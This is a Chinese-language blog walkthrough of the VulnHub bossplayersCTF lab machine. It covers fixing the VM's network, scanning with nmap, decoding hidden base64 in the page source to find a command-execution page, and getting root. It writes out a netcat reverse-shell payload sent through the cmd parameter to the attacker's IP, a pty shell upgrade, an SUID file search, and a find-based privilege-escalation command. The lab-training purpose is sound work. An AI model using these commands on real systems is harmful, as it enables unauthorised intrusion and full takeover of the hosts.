vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透

无论是netdiscover还是nmap都无法扫描出靶机,网络设置都是NAT(之前是桥接不行,百度之后改的)
然后找到这篇文章:
https://blog.csdn.net/asstart/article/details/103433065
前面的都一样,但是到了vim /etc/network/interfacers这一步的时候,居然提示没有图片描述
然后本渣查了好久(好一会儿),发现可以用vi命令修改,果然还是要学点基本的linux操作知识才行。
后面就是百度如何使用vi命令了。
end!
no
然后正式开始扫描
在这里插入图片描述
192.168.1.4那个ip就是了。
nmap扫描详细信息:

vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第1张图片
看到80端口,访问之

vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第2张图片本能右键查看源代码,然后发现这个:

在最最底下,不往下拉根本看不到
jio得可能是base64加密的
vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第3张图片
三次解密,得到这个东东,访问后:

vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第4张图片我也知道可能是远程命令执行之类的,但是万万没想到这个就能直接执行命令……

vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第5张图片
本地nc监听:nc -lvp 1111
浏览器输入http://192.168.1.4/workinginprogress.php?cmd=nc -e /bin/bash 192.168.1.128 1111,192.168.1.128为本机ip
成功回连,但是并不是一个交互式的shell
执行python -c 'import pty;pty.spawn("/bin/bash")',才得到一个交互式的低权限shell。

vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第6张图片
切换到root根目录被拒绝,所以尝试查找具有 SUID权限的文件:find / -perm -u=s -type f 2>/dev/null,发现很多,但是使用的是find命令,嘿嘿嘿。

vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第7张图片
通过find . -exec /bin/sh -p \; -quit提升至root权限(这个命令的功能还不是很懂,本来想通过exp提权的,没想到这么简单)
vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透_第8张图片看参考walkthrough,它是每个命令都要敲两遍(id敲成iidd),但是我的并不需要,这是为啥咧。

你可能感兴趣的:(vulnhub bossplayersCTF靶机 虚拟机设置 & 渗透)